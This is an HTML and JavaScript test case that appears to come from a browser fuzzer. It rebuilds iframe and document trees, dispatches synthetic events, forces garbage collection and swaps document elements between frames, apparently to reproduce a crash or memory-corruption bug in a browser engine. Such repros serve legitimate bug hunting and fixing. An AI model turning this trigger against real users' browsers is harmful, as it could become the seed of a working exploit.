<script>
window.setTimeout("location.reload()",400);
function start() {
try{o6=document.body;}catch(e){}
try{o8=document.getElementById('fuzz_div');}catch(e){}
try{o41=document.documentElement;}catch(e){}
try{o45=document.createRange();;}catch(e){}
try{o45.selectNode(o41);}catch(e){}
try{o45.surroundContents(o8);}catch(e){}
try{o8.onclick=window.cb_onclick_21_1;}catch(e){}
try{o50=document.createEvent('MouseEvents');;}catch(e){}
try{o50.initMouseEvent('click', true, true, window,0, 0, 0, 0, 0, false, false, false, false, 0, null);}catch(e){}
try{o6.dispatchEvent(o50)}catch(e){}
}
function cb_onclick_21_1() {
try{o107=document.documentElement;}catch(e){}
try{o223=new MutationObserver(cb_observer_96_1);;}catch(e){}
try{o223.observe(o8, {childList: true, characterData: true, characterDataOldValue: true})}catch(e){}
try{o228=document.createElement('iframe');;}catch(e){}
fuzzPriv.forceGC();
try{o107.appendChild(o228);}catch(e){}
o228.src="data:text/html,<body onload='window.top.cb()'></body>";
try{o308=document.createElement('iframe');;}catch(e){}
window.setTimeout('window.start_dataiframe1()',10);
}
var called=false;
function cb_observer_96_1() {
if(called) return;
called=true;
try{o107.appendChild(o308);}catch(e){}
try{o425=document.documentElement;}catch(e){}
try{o426=new Blob([o425], {'type': 'image/gif'});}catch(e){}
try{blob=window.URL.createObjectURL(o426)}catch(e){}
try{o308.src=blob}catch(e){}
}
function start_dataiframe1() {
window.setTimeout('window.start_pause7()',10);
}
function start_pause7() {
try{o768=o308.contentWindow.document;}catch(e){}
try{o768.onreadystatechange=cb_onreadystatechange_396_1;}catch(e){}
window.setTimeout('window.top.start_pause11()',10);
try{o819=o308.contentWindow.document;}catch(e){}
}
function cb() {
window.top.setTimeout('window.top.start_pause12()',10);
}
function start_pause11() {
try{o953=o228.contentWindow.document;}catch(e){}
}
function start_pause12() {
o819.open();
}
function cb_onreadystatechange_396_1() {
try{o1119=o819.documentElement;}catch(e){}
try{o1120=o953.documentElement;}catch(e){}
try{o819.removeChild(o1119)}catch(e){}
try{o819.appendChild(o1120)}catch(e){}
}
</script>
<body onload="start()"><div id="fuzz_div"></div></body>
